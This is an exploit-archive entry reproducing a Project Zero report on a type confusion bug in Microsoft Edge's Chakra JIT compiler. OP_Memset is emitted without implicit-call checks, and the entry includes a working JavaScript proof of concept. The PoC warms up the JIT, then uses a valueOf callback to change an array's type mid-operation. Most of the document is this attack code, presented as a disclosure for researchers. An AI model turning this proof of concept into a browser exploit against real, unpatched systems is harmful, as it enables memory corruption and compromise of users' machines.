Microsoft Edge Chakra JIT - OP_Memset Type Confusion Exploit

/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1357
 
function opt(a, b, v) {
    if (b.length < 1)
        return;
 
    for (let i = 0; i < a.length; i++)
        a[i] = v;
 
    b[0] = 2.3023e-320;
}
 
The above JavaScript code is JITed as follows:
 
... CHECKING THE TYPE OF B ...
OP_Memset(a, v, a.length);
b[0] = 2.3023e-320;
 
But there's no ImplicitCallFlags checks around OP_Memset. So it fails to detect if the type of "b" was changed after the "OP_Memset" called.
 
The PoC shows that it can result in type confusion.
 
PoC:
*/
 
function opt(a, b, v) {
    if (b.length < 1)
        return;
 
    for (let i = 0; i < a.length; i++)
        a[i] = v;
 
    b[0] = 2.3023e-320;
}
 
function main() {
    for (let i = 0; i < 1000; i++) {
        opt(new Uint8Array(100), [1.1, 2.2, 3.3], {});
    }
 
    let a = new Uint8Array(100);
    let b = [1.1, 2.2, 3.3];
    opt(a, b, {
        valueOf: () => {
            b[0] = {};
            return 0;
        }
    });
 
    print(b[0]);
}
 
main();

#  0day.today [2018-01-02]  #